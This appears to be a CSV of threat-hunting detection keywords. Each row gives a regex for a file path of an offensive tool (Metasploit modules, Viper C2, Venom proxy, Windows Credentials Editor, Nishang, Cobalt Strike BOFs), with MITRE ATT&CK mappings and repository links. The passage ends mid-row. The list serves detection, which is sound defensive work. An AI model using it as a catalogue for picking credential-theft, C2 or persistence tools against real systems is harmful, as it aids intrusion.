"*/Venom.v1.0.1.7z*",".{0,1000}\/Venom\.v1\.0\.1\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*/Venom.v1.0.2.7z*",".{0,1000}\/Venom\.v1\.0\.2\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*/Venom.v1.0.7z*",".{0,1000}\/Venom\.v1\.0\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*/Venom.v1.1.0.7z*",".{0,1000}\/Venom\.v1\.1\.0\.7z.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*/Venom/tarball/v*",".{0,1000}\/Venom\/tarball\/v.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "*/Venom/zipball/v*",".{0,1000}\/Venom\/zipball\/v.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","1","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" 
"*/ventrilo-info.nse*",".{0,1000}\/ventrilo\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/versant-info.nse*",".{0,1000}\/versant\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/viper.conf*",".{0,1000}\/viper\.conf.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/viper.py*",".{0,1000}\/viper\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/viper.sln*",".{0,1000}\/viper\.sln.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/viper/Docker/*",".{0,1000}\/viper\/Docker\/.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/viper/Docker/nginxconfig/htpasswd*",".{0,1000}\/viper\/Docker\/nginxconfig\/htpasswd.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/vipermsf*",".{0,1000}\/vipermsf.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*/viperpython*",".{0,1000}\/viperpython.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","0","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/viperpython.git*",".{0,1000}\/viperpython\.git.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*/virtualenvs/icebreaker*",".{0,1000}\/virtualenvs\/icebreaker.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/VirusTotalC2/*",".{0,1000}\/VirusTotalC2\/.{0,1000}","offensive_tool_keyword","VirusTotalC2","Abusing VirusTotal API to host our C2 traffic. useful for bypassing blocking firewall rules if VirusTotal is in the target white list and in case you don't have C2 infrastructure. now you have a free one","T1071.004 - T1102 - T1021.002","TA0011 - TA0008 - TA0042","N/A","N/A","C2","https://github.com/RATandC2/VirusTotalC2","1","1","N/A","10","10","7","82","2022-09-28T15:10:44Z","2022-09-28T15:12:42Z" "*/VisualBasicObfuscator*",".{0,1000}\/VisualBasicObfuscator.{0,1000}","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2434","474","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" "*/vmauthd-brute.nse*",".{0,1000}\/vmauthd\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vmware_enum_*.rb*",".{0,1000}\/vmware_enum_.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/VMware-CVE-2022-22954*",".{0,1000}\/VMware\-CVE\-2022\-22954.{0,1000}","offensive_tool_keyword","POC","POC for VMWARE CVE-2022-22954","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/sherlocksecurity/VMware-CVE-2022-22954","1","1","N/A","N/A","3","285","53","2022-04-13T06:15:11Z","2022-04-11T13:59:23Z" "*/vmware-version.nse*",".{0,1000}\/vmware\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vnc-brute.nse*",".{0,1000}\/vnc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vncdll.*",".{0,1000}\/vncdll\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/vncdll/*",".{0,1000}\/vncdll\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/vncEncoder.*",".{0,1000}\/vncEncoder\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/VNCHooks*",".{0,1000}\/VNCHooks.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/VNCHooks.*",".{0,1000}\/VNCHooks\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. 
payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/vnc-info.nse*",".{0,1000}\/vnc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vnc-title.nse*",".{0,1000}\/vnc\-title\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vnik_v1.c*",".{0,1000}\/vnik_v1\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/voldemort-info.nse*",".{0,1000}\/voldemort\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Volumiser.exe*",".{0,1000}\/Volumiser\.exe.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","1","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*/Volumiser.git*",".{0,1000}\/Volumiser\.git.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - 
TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","1","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*/Volumiser-maser.zip*",".{0,1000}\/Volumiser\-maser\.zip.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","1","N/A","7","4","318","34","2023-05-05T14:03:14Z","2022-11-08T21:38:56Z" "*/vpc__enum_lateral_movement*",".{0,1000}\/vpc__enum_lateral_movement.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/vss-enum.py*",".{0,1000}\/vss\-enum\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/vssenum/*",".{0,1000}\/vssenum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*/vtam-enum.nse*",".{0,1000}\/vtam\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vulners.nse*",".{0,1000}\/vulners\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vulnscan.yaml*",".{0,1000}\/vulnscan\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*/vulnserver.py*",".{0,1000}\/vulnserver\.py.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*/vulscan.nse*",".{0,1000}\/vulscan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "*/vuze-dht-info.nse*",".{0,1000}\/vuze\-dht\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/waf__enum/main.py*",".{0,1000}\/waf__enum\/main\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*/Wait_For_Command.ps1*",".{0,1000}\/Wait_For_Command\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*/Waitfor-Persistence.git*",".{0,1000}\/Waitfor\-Persistence\.git.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*/Waitfor-Persistence.ps1*",".{0,1000}\/Waitfor\-Persistence\.ps1.{0,1000}","offensive_tool_keyword","Waitfor-Persistence","Use Waitfor.exe to maintain persistence","T1059 - T1117 - T1053.005 - T1546.013","TA0002 - TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/Waitfor-Persistence","1","1","N/A","9","1","55","19","2021-04-17T01:41:42Z","2017-06-07T09:33:13Z" "*/wapitiCore/*",".{0,1000}\/wapitiCore\/.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*/wapiti-scanner/*",".{0,1000}\/wapiti\-scanner\/.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*/Watson.exe*",".{0,1000}\/Watson\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/Watson.exe*",".{0,1000}\/Watson\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/wce32.exe*",".{0,1000}\/wce32\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*/wce64.exe*",".{0,1000}\/wce64\.exe.{0,1000}","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential 
